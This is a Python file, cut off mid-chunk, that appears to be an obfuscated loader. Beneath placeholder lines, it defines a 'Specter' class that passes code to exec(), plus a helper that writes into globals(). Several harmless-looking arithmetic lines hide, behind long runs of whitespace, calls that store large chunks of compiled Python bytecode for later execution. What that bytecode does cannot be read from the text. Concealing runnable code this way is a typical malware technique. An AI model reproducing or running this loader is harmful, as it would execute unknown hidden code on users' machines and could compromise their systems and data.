# 0

# 0

# 0

# 0


__0__ = "0"
__0__ = "0"
__0__ = "0"
__0__ = "0"
__code__ = "0"


Any = (...)

class Specter:
    def __init__(self, code: str) -> None:
        self.code = code
        self.execute(...)
        return None
    def execute(self, code: str = ...) -> None:
        return exec(str(code))
    
class Func:
    def calculate(num: int) -> int:
        return num*2
    def define(key, value: Any) -> Any:
        globals()[key] = value
        return globals()[key]

__6088__ = Func.calculate(3)                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ,Func.define('__6088__', b'c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00k\x06\x00\x00@\x00\x00\x00sfB\x00\x00d\x00d\x01l\x00T\x00d\x02d\x03d\x04d\x05d\x06d\x07d\x08d\td\nd\x0bd\x0cd\rd\x0ed\x0fd\x10d\x11d\x08d\x12d\x13d\x14d\x15d\x16d\x17d\x18d\x19d\x1ad\x1bd\x1cd\x1dd\x1ed\x1fd d!d"d#d#d$d%d&d\'d(d)d*d+d#d,d-d.d/d0d1d2d3d4d5d6d7d8d#d9d:d;d<d=d>d?d@dAdBdCdDdEd\x0fdFdGdHd\x0fdIdJd#dKd1dLdMd#dNdOdPdQdRdSdTd#dUd\x1ddVd#dWdXdYdZd[d\\d]d^d_d`dadbdcddd#dedfdgdhdidjd#dkdldmdndodpdqdrdsdsdtdudvdwdxd#dyd#dAdzd{d|d}d1d~d#d\x7fd\x80d\x81d\x82d\x83d\x84d\x85d\x86d\td\x87d#d\x88d\x89d\x8ad\x8bd\x8cd\x8ddtd#d\x8ed\x88d\x8fd\x90d\x91d\x92d9d\x93d\x94d\x95dQd\x96d\x97d\x98d\x99d\x9ad\x9bd\x9cd\x9dd\x9ed\x0fd#d\x9fd\xa0d\xa1d1d\x0fd#d\xa2dsd\xa3dCd\xa4d\xa5d\xa6d\xa7d\xa8d\xa9d\xaad\xabd\xacd\xadd\x11d#d\xaed\xafd\xb0dQd\xb1dQd\xb2d\xb3dAd\xb4d\xb5d\xb6d\xb7d\xb8d\x1dd\xb9d\xbad\xbbd\xbcd\xbdd\xbed\xbfd\xc0d\xc1d\xc2d\xabd\xc3d\xc4d\xc5d\xc6d\xc7d\xc8d\xc9d\xcad\xcbd\xccd\xcdd\x1dd\xced\xcfd\xd0d\xd1d\xd2d\xd3d\xd4d\xd5d\xd6d\xd7d\xd8d#d\xd9d\xdad\xdbd\xdcd\xddd\xded\xdfd\xe0d\xe1d\xe2dAd\x1dd#d#d\xe3d\xe4d\xe5dwd\x1dd\xe6d\xe7d\xe8d#d\xe9d\xead#d\xebd#d\xecd\xedd\xeed\xefdjd\xf0d#d\x1dd\xf1d\xf2d\xf3d\xf4d\xf5d\xf6d\xf7d\xf8d\xf9d\xa8d\x0fd\x88d\xfad\xfbdGd\xfcd\xfdd\xfed\xff\x90\x01d\x00\x90\x01d\x01\x90\x01d\x02\x90\x01d\x03\x90\x01d\x04\x90\x01d\x05\x90\x01d\x06\x90\x01d\x07\x90\x01d\x08\x90\x01d\td1\x90\x01d\n\x90\x01d\x0b\x90\x01d\x0c\x90\x01d\r\x90\x01d\x0ed#\x90\x01d\x0f\x90\x01d\x10\x90\x01d\x11\x90\x01d\x12dAd\x1d\x90\x01d\x13\x90\x01d\x14\x90\x01d\x15\x90\x01d\x16\x90\x01d\x17d#dAd\x1d\x90\x01d\x18\x90\x01d\x19\x90\x01d\x1a\x90\x01d\x1b\x90\x01d\x1c\x90\x01d\x1d\x90\x01d\x1e\x90\x01d\x1f\x90\x01d\x0c\x90\x01d \x90\x01d!\x90\x01d"\x90\x01d#\x90\x01d$\x90\x01d%d#\x90\x01d&\x90\x01d\'\x90\x01d(\x90\x01d)\x90\x01d*\x90\x01d+\x90\x01d,\x90\x01d-\x90\x01d.\x90\x01d/\x90\x01d0\x90\x01d1\x90\x01d2d#\x90\x01d3d#\x90\x01d4\x90\x01d5\x90\x01d6d#\x90\x01d7\x90\x01d8\x90\x01d9\x90\x01d:d#d#\x90\x01d;\x90\x01d<\x90\x01d=\x90\x01d>\x90\x01d?\x90\x01d@d#\x90\x01dAd#\x90\x01dB\x90\x01dC\x90\x01dD\x90\x01dE\x90\x01dFd#\x90\x01dG\x90\x01dH\x90\x01dI\x90\x01dJ\x90\x01dK\x90\x01dL\x90\x01dMd#\x90\x01dN\x90\x01dO\x90\x01dP\x90\x01dQ\x90\x01dR\x90\x01dS\x90\x01dT\x90\x01dU\x90\x01d\x14\x90\x01dV\x90\x01dWd\x1d\x90\x01dX\x90\x01dY\x90\x01dZ\x90\x01d[\x90\x01d\\\x90\x01d]\x90\x01d^\x90\x01d_\x90\x01dP\x90\x01d`\x90\x01dad#\x90\x01db\x90\x01dc\x90\x01d!\x90\x01dd\x90\x01de\x90\x01df\x90\x01dg\x90\x01dh\x90\x01di\x90\x01dj\x90\x01dk\x90\x01dl\x90\x01dm\x90\x01dR\x90\x01dn\x90\x01do\x90\x01dpd\x1d\x90\x01dq\x90\x01dr\x90\x01ds\x90\x01dtdC\x90\x01du\x90\x01dv\x90\x01dw\x90\x01dx\x90\x01dy\x90\x01dzd#\x90\x01d{d#\x90\x01d|\x90\x01d}\x90\x01d~\x90\x01d\x7fdQd#\x90\x01d\x80\x90\x01d\x81d\x1dd\x0f\x90\x01d\x82\x90\x01d\x83\x90\x01d\x84\x90\x01d\x85\x90\x01d\x86d#\x90\x01d\x87\x90\x01d\x88\x90\x01d\x89\x90\x01d\x8adt\x90\x01d\x8b\x90\x01d\x8cd#\x90\x01d\x8d\x90\x01d\x8e\x90\x01d\x8f\x90\x01d\x90\x90\x01d\x91\x90\x01d\x92\x90\x01d\x93\x90\x01d\x94\x90\x01d\x95d\x84\x90\x01d\x96\x90\x01d\x97d#\x90\x01d\x98d#\x90\x01d\x99d#\x90\x01d\x9ad1\x90\x01d\x9b\x90\x01d\x9c\x90\x01d\x9d\x90\x01d\x9ed#\x90\x01d\x9f\x90\x01d\xa0\x90\x01d\xa1\x90\x01d\xa2\x90\x01d\xa3d\x0f\x90\x01d\xa4d#\x90\x01d\xa5\x90\x01d\xa6d#\x90\x01d\xa7d\xc2\x90\x01d\xa8d#\x90\x01d\xa9\x90\x01d\xaadt\x90\x01d\xab\x90\x01dGd\x1dd>\x90\x01d\xac\x90\x01d\xad\x90\x01d\xaed#\x90\x01d\xaf\x90\x01d\xb0\x90\x01d\xb1\x90\x01d\xb2d#\x90\x01d\xb3\x90\x01d\xb4\x90\x01d\xb5\x90\x01d\xb6\x90\x01d\xb7\x90\x01d\xb8\x90\x01d\xb9d#\x90\x01d\xba\x90\x01d\xbb\x90\x01d\xbc\x90\x01d\xbd\x90\x01d\xbe\x90\x01d\xa0\x90\x01d\xbf\x90\x01d\xc0\x90\x01d\xc1\x90\x01d\xc2\x90\x01d\xc3\x90\x01d\xc4\x90\x01d\xc5d#\x90\x01d\xc6\x90\x01d\xc7\x90\x01d\xc8\x90\x01d\xc9\x90\x01d\xca\x90\x01d\xcb\x90\x01d\xcc\x90\x01d\xcd\x90\x01d\xced#\x90\x01d\xcf\x90\x01d\xd0\x90\x01d\xd1d\x8e\x90\x01d\xd2\x90\x01d\xd3\x90\x01d\xd4\x90\x01d\xd5\x90\x01d\xd6d>\x90\x01d\xd7\x90\x01d\xd8\x90\x01d\xd9\x90\x01d\xda\x90\x01d\xdb\x90\x01d\xdcd#\x90\x01d\xdddAd#\x90\x01d\xde\x90\x01d\xdf\x90\x01d\xe0\x90\x01d\xe1\x90\x01d\xe2\x90\x01d\x1ad\xa0\x90\x01d\xe3\x90\x01d\xe4\x90\x01d\xe5\x90\x01d\xe6\x90\x01d\xe7\x90\x01d\xe8\x90\x01d\xe9d1\x90\x01d\xea\x90\x01d\xebd#\x90\x01d\xecd#\x90\x01d\xed\x90\x01d\xee\x90\x01d\xef\x90\x01d\xf0\x90\x01d\xf1\x90\x01d\xf2dQ\x90\x01d\xf3d#d#\x90\x01d\xf4\x90\x01d\xf5\x90\x01d\xf6\x90\x01d\xf7d#\x90\x01d\xf8\x90\x01d\xf9\x90\x01d\xfad\x1d\x90\x01d\xfbd#\x90\x01d\xfcd#\x90\x01d\xfdd#\x90\x01d\xfe\x90\x01d\xff\x90\x02d\x00\x90\x02d\x01\x90\x02d\x02\x90\x02d\x03d#\x90\x01d\x8b\x90\x02d\x04\x90\x02d\x05\x90\x02d\x06\x90\x02d\x07\x90\x02d\x08\x90\x02d\t\x90\x02d\n\x90\x02d\x0bdA\x90\x02d\x0c\x90\x02d\r\x90\x02d\x0e\x90\x02d\x0fdQd\x1d\x90\x02d\x10\x90\x02d\x11d#d#\x90\x02d\x12\x90\x02d\x13\x90\x02d\x08\x90\x02d\x14\x90\x02d\x15d#\x90\x02d\x16\x90\x02d\x17\x90\x02d\x18\x90\x02d\x19\x90\x02d\x1adod#\x90\x02d\x1b\x90\x02d\x1c\x90\x02d\x1d\x90\x02')
__8787__ = Func.calculate(3)                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ,Func.define('__8787__', b'd\x1e\x90\x02d\x1f\x90\x02d \x90\x02d!\x90\x02d"\x90\x02d#\x90\x02d$\x90\x02d%\x90\x02d&\x90\x02d\'\x90\x02d(d#\x90\x02d)\x90\x02d*\x90\x02d+d\t\x90\x02d,\x90\x02d-\x90\x02d.\x90\x02d/\x90\x02d0\x90\x02d1d#\x90\x02d2\x90\x02d3\x90\x02d4d\x1d\x90\x02d5\x90\x02d6\x90\x02d7d#\x90\x02d8\x90\x02d9\x90\x02d:\x90\x02d;\x90\x02d<\x90\x02d=\x90\x02d>\x90\x02d?\x90\x02d@dA\x90\x02dA\x90\x01d\x0c\x90\x02dB\x90\x02dC\x90\x02dD\x90\x02dE\x90\x02dF\x90\x02dG\x90\x02dHd#\x90\x01d\xfa\x90\x02dI\x90\x02dJd\x1d\x90\x02dK\x90\x02dL\x90\x02dM\x90\x02dN\x90\x02dO\x90\x02dPd1\x90\x02dQd#d|d#\x90\x02dR\x90\x02dS\x90\x02dT\x90\x02dU\x90\x02dV\x90\x02dW\x90\x02dX\x90\x02dYd\x1d\x90\x02dZ\x90\x02d[d#dQ\x90\x02d\\\x90\x02d]\x90\x02d^d#d\xbf\x90\x02d_\x90\x02d`dQ\x90\x02da\x90\x02dbd#\x90\x01dU\x90\x02dcd\x1dd#\x90\x02ddd#d1\x90\x02de\x90\x02df\x90\x02dgd#\x90\x01d\x14\x90\x02dh\x90\x02di\x90\x02dj\x90\x02dk\x90\x02dld\x08d#\x90\x02dm\x90\x02dn\x90\x02do\x90\x02dpdA\x90\x02dq\x90\x02dr\x90\x01d\xf9\x90\x02ds\x90\x02dt\x90\x02du\x90\x02dvd#\x90\x02dw\x90\x02dxd#d#\x90\x02dy\x90\x02dz\x90\x02d{\x90\x02d|\x90\x01dA\x90\x02d}\x90\x02d~\x90\x02d\x7f\x90\x02d\x80\x90\x01d0\x90\x02db\x90\x02d\x81\x90\x02d\x82d#d1\x90\x02d\x83\x90\x02d\x84\x90\x02d\x85\x90\x02d\x86\x90\x02d\x87\x90\x01d8\x90\x02d\x88\x90\x02d\x89\x90\x02d\x8ad#d#\x90\x02d\x8bdAd#\x90\x02d\x8c\x90\x02d\x8d\x90\x02d\x8e\x90\x02d\x8f\x90\x02d\x90d\x1d\x90\x02d\x91dt\x90\x02d\x92\x90\x02d\x93\x90\x02d\x94\x90\x01d\xa6d\x1d\x90\x02d\x95d#\x90\x02d\x96d#\x90\x02d\x97\x90\x02d\x98d\x0f\x90\x02d\x99\x90\x02d\x9a\x90\x02d\x9b\x90\x02d\x9cdGdA\x90\x02d\x9d\x90\x02d\x9e\x90\x02d\x9f\x90\x02d\xa0\x90\x02d\xa1\x90\x02d\xa2\x90\x02d\xa3\x90\x02d\xa4\x90\x02d\xa5d#\x90\x02d\xa6\x90\x02d\xa7\x90\x02d\xa8\x90\x02d\xa9\x90\x02d\xaa\x90\x02d\xab\x90\x01d\x82d#\x90\x02d\xac\x90\x02dz\x90\x02d\xadd\xf5\x90\x02d\xae\x90\x02d\xaf\x90\x02d\xb0\x90\x02d\xb1\x90\x02d\xb2\x90\x02d\xb3d#\x90\x02d\xb4\x90\x02d\xb5\x90\x02d\xb6\x90\x02d\xb7\x90\x02d\xb8\x90\x02dV\x90\x02d\xb9dQ\x90\x02d\xba\x90\x02d\xbb\x90\x02d\xbc\x90\x02d\xbd\x90\x02d\xbe\x90\x02d\xbfd\x0f\x90\x02d\xc0\x90\x01d\xdb\x90\x02d\xc1d1\x90\x02d\xc2\x90\x02d\xc3\x90\x02d\xc4d\x88\x90\x02d\xc5\x90\x02d\xc6\x90\x02d\xc7\x90\x02d\xc8\x90\x02d\xc9\x90\x02d\xca\x90\x02d\xcb\x90\x02d\xcc\x90\x02d\xcd\x90\x02d\xce\x90\x02d\xcf\x90\x02d\xd0\x90\x02d\xd1\x90\x02d\xd2d#\x90\x02d\xd3\x90\x01d\x14\x90\x02d\xd4\x90\x02d\xd5\x90\x02d\xd6\x90\x02d\xd7d#\x90\x02d\xd8\x90\x02d\xd9\x90\x02d\xdad#\x90\x02d\xdb\x90\x02d\xdc\x90\x02d\xddd#\x90\x02d\xde\x90\x02d\xdf\x90\x02d\xe0\x90\x02d\xe1\x90\x02d\xe2\x90\x02dB\x90\x02d\xe3\x90\x02d\xe4\x90\x02dEd#\x90\x02d\xe5\x90\x02d\xe6\x90\x02d\xe7\x90\x02d\xe8\x90\x02d\xe9d#\x90\x02d\xead#\x90\x02dH\x90\x02d\xeb\x90\x02d\xecd#d#\x90\x02d\xed\x90\x02d\xee\x90\x02d\xef\x90\x02d\xf0\x90\x02d\xf1d#\x90\x02d\xf2\x90\x02d\xf3\x90\x02d\xf4d#\x90\x02d\xf5dQ\x90\x02d\xf6\x90\x02d\xf7\x90\x02d\xf8\x90\x02d\xf9\x90\x02d\xfa\x90\x02d\xfb\x90\x02d\xfc\x90\x02d\xfdd1\x90\x02d\xfe\x90\x02d\xff\x90\x03d\x00\x90\x01d\xb7\x90\x03d\x01d#\x90\x03d\x02d#\x90\x03d\x03\x90\x03d\x04\x90\x03d\x05\x90\x03d\x06\x90\x03d\x07\x90\x03d\x08d#\x90\x03d\t\x90\x03d\n\x90\x03d\x0b\x90\x03d\x0c\x90\x03d\r\x90\x03d\x0e\x90\x03d\x0f\x90\x03d\x10\x90\x03d\x11\x90\x03d\x12\x90\x03d\x13\x90\x03d\x14\x90\x03d\x15\x90\x03d\x16\x90\x02d\xb5\x90\x03d\x17d\x88d#\x90\x03d\x18d#\x90\x03d\x19\x90\x03d\x1a\x90\x03d\x1b\x90\x03d\x1c\x90\x03d\x1d\x90\x03d\x1e\x90\x03d\x1f\x90\x03d \x90\x03d!\x90\x03d"\x90\x03d#\x90\x03d$d\xb1\x90\x03d%d#\x90\x03d&\x90\x03d\'\x90\x03d(\x90\x03d)\x90\x01d\xed\x90\x03d*\x90\x03d+\x90\x03d,\x90\x03d-\x90\x03d.\x90\x03d/d#\x90\x03d0\x90\x03d1\x90\x03d2\x90\x03d3\x90\x03d4\x90\x03d5\x90\x03d6\x90\x03d7d\x1d\x90\x03d8\x90\x03d9\x90\x03d:\x90\x03d;\x90\x03d<\x90\x03d=d1\x90\x03d>\x90\x03d?\x90\x03d@\x90\x03dA\x90\x03dB\x90\x03dC\x90\x03dD\x90\x03dE\x90\x03dFd#d\x11\x90\x03dGd#\x90\x01d\'\x90\x03dHd#\x90\x03dI\x90\x03dJ\x90\x03dKd#\x90\x03dL\x90\x03dM\x90\x03dN\x90\x03dO\x90\x03dP\x90\x03dQ\x90\x03dR\x90\x03dS\x90\x03dT\x90\x02dH\x90\x03dUd#\x90\x03dV\x90\x03dW\x90\x03dX\x90\x01d\x1bd#d#\x90\x03dY\x90\x01d\xb7\x90\x03dZd\x88\x90\x03d[d#\x90\x03d\\\x90\x03d]d#\x90\x03d^d\x1d\x90\x03d_\x90\x03d`\x90\x03da\x90\x03db\x90\x01d\x14d\xf4\x90\x03dc\x90\x03dd\x90\x03de\x90\x03df\x90\x03dg\x90\x01d1\x90\x01d\xa5\x90\x03dh\x90\x03di\x90\x03dj\x90\x01d\x1d\x90\x03dk\x90\x03dl\x90\x03dm\x90\x03dn\x90\x03do\x90\x03dp\x90\x03dq\x90\x03dr\x90\x03dsd#\x90\x03dt\x90\x03du\x90\x03dv\x90\x03dwd\x0f\x90\x03dxdt\x90\x03dy\x90\x03dz\x90\x03d{\x90\x03d|\x90\x03d}\x90\x03d~\x90\x03d\x7f\x90\x01d\xd3\x90\x03d\x80\x90\x01d\xa1d#\x90\x03d\x81\x90\x03d\x82\x90\x03d\x83d#\x90\x01d\xef\x90\x03d\x84\x90\x03d\x85\x90\x03d\x86\x90\x03d\x87\x90\x03d>\x90\x03d\x88\x90\x03d\x89\x90\x03d\x8a\x90\x03d\x8b\x90\x03d\x8cd\x81\x90\x03d\x8d\x90\x01d\x99\x90\x03d\x8e\x90\x03d\x8fd\x0f\x90\x03d\x90\x90\x03d\x91\x90\x03d\x92\x90\x03d\x93d#\x90\x03d\x94\x90\x03d\x95\x90\x03d\x96\x90\x03d\x97\x90\x03d\x98\x90\x02d\xaa\x90\x03d\x99\x90\x03d\x9a\x90\x03d\x9bdXdQ\x90\x03d\x9c\x90\x03d\x9d\x90\x03d\x9e\x90\x03d\x9fd:\x90\x03d\xa0\x90\x03d\xa1\x90\x03d\xa2d#\x90\x03d\xa3\x90\x03d\xa4dA\x90\x03d\xa5\x90\x03d\xa6\x90\x01d\xa3\x90\x03d\xa7\x90\x03d\xa8\x90\x03d\xa9\x90\x03d\xaad\xf9\x90\x03d\xab\x90\x03d\xacd#\x90\x03d\xad\x90\x03d\xae\x90\x03d\xafd\x1d\x90\x03d\xb0\x90\x03d\xb1\x90\x03d\xb2\x90\x03d\xb3d#\x90\x03d\xb4\x90\x03d\xb5\x90\x03d\xb6\x90\x03d\xb7\x90\x03d\xb8\x90\x03')
__5600__ = Func.calculate(5)                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ,Func.define('__5600__', b'd\xb9\x90\x02d\x8b\x90\x03d\xba\x90\x03d\xbb\x90\x03d\xbcdt\x90\x03d\xbd\x90\x03d\xbed\x1d\x90\x03d\xbf\x90\x03d\xc0\x90\x02dE\x90\x03d\xc1\x90\x03d\xc2\x90\x03d\xc3\x90\x02dh\x90\x03d\xc4\x90\x03d\xc5\x90\x03d\xc6d1dod\x1d\x90\x03d\xc7\x90\x03d\xc8\x90\x01d\xeb\x90\x03d\xc9d\x0fd#\x90\x03d\xcad\td#\x90\x03d\xcbd#d#\x90\x03d\xcc\x90\x03d\xcdd\xd1\x90\x03d\xcedA\x90\x03d\xcf\x90\x03d\xd0\x90\x01d\x14\x90\x03d\xd1\x90\x02dN\x90\x03d\xd2d#d#\x90\x03d\xd3\x90\x03d\xd4\x90\x03d\xd5\x90\x02d8\x90\x03d\xd6d\xbf\x90\x03d\xd7d#\x90\x03d\xd8\x90\x03d\xd9\x90\x03d\xda\x90\x03d\xdb\x90\x03d\xdc\x90\x03d\xdd\x90\x02d\x0e\x90\x03d\xde\x90\x02dL\x90\x03d\xdf\x90\x03d\xe0d\x1f\x90\x03d\xe1d#d1\x90\x03d\xe2\x90\x03d\xe3\x90\x03d\xbe\x90\x03d\xe4\x90\x03d\xe5d\xc4\x90\x03d\xe6\x90\x03d\xe7\x90\x03d\xe8\x90\x03d\xe9d\x1d\x90\x01d\x1b\x90\x03d\xe5d#\x90\x03d\xea\x90\x03d\xeb\x90\x03d\xec\x90\x03d\xed\x90\x03d\xee\x90\x03d\xef\x90\x03d\xf0\x90\x03d\xf1\x90\x03d\xf2d#\x90\x03d\t\x90\x03d\xf3\x90\x03d\xf4d#\x90\x03d\xf5d\x0f\x90\x03d\xf6\x90\x03d\xf7\x90\x03d\xf8\x90\x03d\xf9\x90\x03d\xfad#d\x1d\x90\x03d\xfb\x90\x03d\xfcdQ\x90\x03d\xfd\x90\x03d\xfe\x90\x03d\xff\x90\x04d\x00\x90\x04d\x01d\x0f\x90\x04d\x02d#\x90\x04d\x03\x90\x04d\x04d#\x90\x04d\x05\x90\x04d\x06\x90\x04d\x07\x90\x04d\x08d#\x90\x04d\td#d#\x90\x04d\n\x90\x04d\x0b\x90\x04d\x0cd#\x90\x04d\rd1\x90\x04d\x0e\x90\x04d\x0f\x90\x04d\x10\x90\x04d\x11\x90\x04d\x12\x90\x01d\xd9\x90\x04d\x13\x90\x04d\x14\x90\x04d\x15\x90\x04d\x16\x90\x04d\x17d#\x90\x04d\x18\x90\x04d\x19\x90\x04d\x1a\x90\x04d\x1b\x90\x04d\x1c\x90\x04d\x1d\x90\x04d\x1ed\x88d#\x90\x04d\x1f\x90\x04d \x90\x04d!\x90\x04d"d\x88\x90\x04d#\x90\x04d$\x90\x04d%\x90\x04d&\x90\x04d\'\x90\x04d(\x90\x04d)\x90\x04d*\x90\x03d\xdd\x90\x04d+\x90\x04d,\x90\x04d-\x90\x04d.\x90\x04d/\x90\x04d0\x90\x04d1\x90\x04d2dnd9\x90\x04d3\x90\x04d4\x90\x04d5\x90\x04d6d#\x90\x04d7\x90\x01d\xa0\x90\x04d8\x90\x04d9\x90\x04d:\x90\x04d;\x90\x04d<\x90\x02d\xb3d#d#\x90\x04d=\x90\x04d>\x90\x04d?\x90\x04d@\x90\x04dA\x90\x04dB\x90\x04dCdA\x90\x04dD\x90\x04dE\x90\x04dF\x90\x04dGdG\x90\x04dH\x90\x04dI\x90\x04dJ\x90\x04dKd\x14e\x01\x90\x04dL\x90\x04dM\x90\x04dN\x90\x04dOdQ\x90\x04dPd#dB\x90\x04dQ\x90\x04dR\x90\x01d\xff\x90\x01dY\x90\x04dS\x90\x04dT\x90\x04dU\x90\x04dV\x90\x04dW\x90\x04dX\x90\x04dY\x90\x04dZ\x90\x04d[\x90\x04d\\\x90\x04d]\x90\x04d^d#\x90\x04d_\x90\x04d`\x90\x03dy\x90\x04da\x90\x04db\x90\x03d\xde\x90\x04dc\x90\x04dd\x90\x04de\x90\x02d\x8b\x90\x04df\x90\x04dg\x90\x04dh\x90\x04did#\x90\x04djd#\x90\x03dP\x90\x04dk\x90\x04dl\x90\x04dm\x90\x04dnd9\x90\x04do\x90\x04dp\x90\x04dq\x90\x04dr\x90\x04ds\x90\x04dt\x90\x04du\x90\x04dv\x90\x02d\x8b\x90\x04dw\x90\x04dxd#\x90\x04dy\x90\x04dz\x90\x04d{\x90\x04d|\x90\x04d}d#\x90\x04d~\x90\x02d\xaa\x90\x01dod\xf4\x90\x04d\x7f\x90\x04d\x80d#\x90\x04d\x81d#d#\x90\x04d\x82\x90\x04d\x83\x90\x04d\x84\x90\x04d\x85\x90\x02dz\x90\x04d\x86\x90\x04d\x87\x90\x03dy\x90\x04d\x88\x90\x04d\x89\x90\x04d\x8a\x90\x04d\x8bd\x0fd#\x90\x04d\x8cd1\x90\x03d\x04dQ\x90\x04d\x8d\x90\x01dL\x90\x04d\x8ed+\x90\x04d\x8fd\x0f\x90\x04d\x90\x90\x04d\x91\x90\x04d\x92\x90\x04d\x93\x90\x04d\x94d\xbf\x90\x04d\x95d\x0f\x90\x04d\x96\x90\x04d\x97d#d\x9ad1\x90\x04d\x98dI\x90\x04d\x99\x90\x04d\x9ad#\x90\x02d\xc0\x90\x03d\xf7\x90\x04d\x9b\x90\x04d\x9c\x90\x04d\x9ddQd#\x90\x04d\x9e\x90\x04d\x9fd#\x90\x04d\xa0\x90\x01d\x01d\x1d\x90\x04d\xa1d#d#\x90\x04d\xa2\x90\x04d\xa3\x90\x04d\xa4\x90\x04d\xa5\x90\x04d\xa6\x90\x04d\xa7\x90\x04d\xa8\x90\x04d\xa9\x90\x04d\xaadQ\x90\x04d\xab\x90\x04d\xac\x90\x01dP\x90\x04d\xad\x90\x04d\xae\x90\x04d\xaf\x90\x04d\xb0\x90\x04d\xb1\x90\x01d\x1a\x90\x04d\xb2\x90\x04d\xb3\x90\x04d\xb4d\x98d#d#\x90\x04d\xb5\x90\x04d\xb6\x90\x04d\xb7\x90\x04d\xb8\x90\x04d\xb9\x90\x04d\xbad\xead\x1d\x90\x04d\xbb\x90\x04d\xbcd\x1d\x90\x03d\x99d\x0f\x90\x04d\xbd\x90\x04d\xbe\x90\x04d\xbfd#d\t\x90\x04d\xc0\x90\x04d\xc1\x90\x04d\xc2\x90\x04d\xc3dA\x90\x04d\xc4\x90\x04d\xc5\x90\x04d\xc6\x90\x04d\xc7\x90\x04d\xc8\x90\x02dt\x90\x04d\xc9\x90\x04d\xca\x90\x04d\xcb\x90\x04d\xcc\x90\x06fk\x90\x06\\kZ\x02Z\x03Z\x04Z\x05Z\x06Z\x07Z\x08Z\tZ\nZ\x0bZ\x0cZ\rZ\x0eZ\x0fZ\x10Z\x11Z\x12Z\x13Z\x14Z\x15Z\x16Z\x17Z\x18Z\x19Z\x1aZ\x1bZ\x1cZ\x1dZ\x1eZ\x1fZ Z!Z"Z#Z$Z%Z&Z\'Z(Z)Z*Z+Z,Z-Z.Z/Z0Z1Z2Z3Z4Z5Z6Z7Z8Z9Z:Z;Z<Z=Z>Z?Z@ZAZBZCZDZEZFZGZHZIZJZKZLZMZNZOZPZQZRZSZTZUZVZWZXZYZZZ[Z\\Z]Z^Z_Z`ZaZbZcZdZeZfZgZhZiZjZkZlZmZnZoZpZqZrZsZtZuZvZwZxZyZzZ{Z|Z}Z~Z\x7fZ\x80Z\x81Z\x82Z\x83Z\x84Z\x85Z\x86Z\x87Z\x88Z\x89Z\x8aZ\x8bZ\x8cZ\x8dZ\x8eZ\x8fZ\x90Z\x91Z\x92Z\x93Z\x94Z\x95Z\x96Z\x97Z\x98Z\x99Z\x9aZ\x9bZ\x9cZ\x9dZ\x9eZ\x9fZ\xa0Z\xa1Z\xa2Z\xa3Z\xa4Z\xa5Z\xa6Z\xa7Z\xa8Z\xa9Z\xaaZ\xabZ\xacZ\xadZ\xaeZ\xafZ\xb0Z\xb1Z\xb2Z\xb3Z\xb4Z\xb5Z\xb6Z\xb7Z\xb8Z\xb9Z\xbaZ\xbbZ\xbcZ\xbdZ\xbeZ\xbfZ\xc0Z\xc1Z\xc2Z\xc3Z\xc4Z\xc5Z\xc6Z\xc7Z\xc8Z\xc9Z\xcaZ\xcbZ\xccZ\xcdZ\xceZ\xcfZ\xd0Z\xd1Z\xd2Z\xd3Z\xd4Z\xd5Z\xd6Z\xd7Z\xd8Z\xd9Z\xdaZ\xdbZ\xdcZ\xddZ\xdeZ\xdfZ\xe0Z\xe1Z\xe2Z\xe3Z\xe4Z\xe5Z\xe6Z\xe7Z\xe8Z\xe9Z\xeaZ\xebZ\xecZ\xedZ\xeeZ\xefZ\xf0Z\xf1Z\xf2Z\xf3Z\xf4Z\xf5Z\xf6Z\xf7Z\xf8Z\xf9Z\xfaZ\xfbZ\xfcZ\xfdZ\xfeZ\xff\x90\x01Z\x00\x90\x01Z\x01\x90\x01Z\x02\x90\x01Z\x03\x90\x01Z\x04\x90\x01Z\x05\x90\x01Z\x06\x90\x01Z\x07\x90\x01Z\x08\x90\x01Z\t\x90\x01Z\n\x90\x01Z\x0b')
__9245__ = Func.calculate(2)                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ,Func.define('__9245__', b'\x90\x01Z\x0c\x90\x01Z\r\x90\x01Z\x0e\x90\x01Z\x0f\x90\x01Z\x10\x90\x01Z\x11\x90\x01Z\x12\x90\x01Z\x13\x90\x01Z\x14\x90\x01Z\x15\x90\x01Z\x16\x90\x01Z\x17\x90\x01Z\x18\x90\x01Z\x19\x90\x01Z\x1a\x90\x01Z\x1b\x90\x01Z\x1c\x90\x01Z\x1d\x90\x01Z\x1e\x90\x01Z\x1f\x90\x01Z \x90\x01Z!\x90\x01Z"\x90\x01Z#\x90\x01Z$\x90\x01Z%\x90\x01Z&\x90\x01Z\'\x90\x01Z(\x90\x01Z)\x90\x01Z*\x90\x01Z+\x90\x01Z,\x90\x01Z-\x90\x01Z.\x90\x01Z/\x90\x01Z0\x90\x01Z1\x90\x01Z2\x90\x01Z3\x90\x01Z4\x90\x01Z5\x90\x01Z6\x90\x01Z7\x90\x01Z8\x90\x01Z9\x90\x01Z:\x90\x01Z;\x90\x01Z<\x90\x01Z=\x90\x01Z>\x90\x01Z?\x90\x01Z@\x90\x01ZA\x90\x01ZB\x90\x01ZC\x90\x01ZD\x90\x01ZE\x90\x01ZF\x90\x01ZG\x90\x01ZH\x90\x01ZI\x90\x01ZJ\x90\x01ZK\x90\x01ZL\x90\x01ZM\x90\x01ZN\x90\x01ZO\x90\x01ZP\x90\x01ZQ\x90\x01ZR\x90\x01ZS\x90\x01ZT\x90\x01ZU\x90\x01ZV\x90\x01ZW\x90\x01ZX\x90\x01ZY\x90\x01ZZ\x90\x01Z[\x90\x01Z\\\x90\x01Z]\x90\x01Z^\x90\x01Z_\x90\x01Z`\x90\x01Za\x90\x01Zb\x90\x01Zc\x90\x01Zd\x90\x01Ze\x90\x01Zf\x90\x01Zg\x90\x01Zh\x90\x01Zi\x90\x01Zj\x90\x01Zk\x90\x01Zl\x90\x01Zm\x90\x01Zn\x90\x01Zo\x90\x01Zp\x90\x01Zq\x90\x01Zr\x90\x01Zs\x90\x01Zt\x90\x01Zu\x90\x01Zv\x90\x01Zw\x90\x01Zx\x90\x01Zy\x90\x01Zz\x90\x01Z{\x90\x01Z|\x90\x01Z}\x90\x01Z~\x90\x01Z\x7f\x90\x01Z\x80\x90\x01Z\x81\x90\x01Z\x82\x90\x01Z\x83\x90\x01Z\x84\x90\x01Z\x85\x90\x01Z\x86\x90\x01Z\x87\x90\x01Z\x88\x90\x01Z\x89\x90\x01Z\x8a\x90\x01Z\x8b\x90\x01Z\x8c\x90\x01Z\x8d\x90\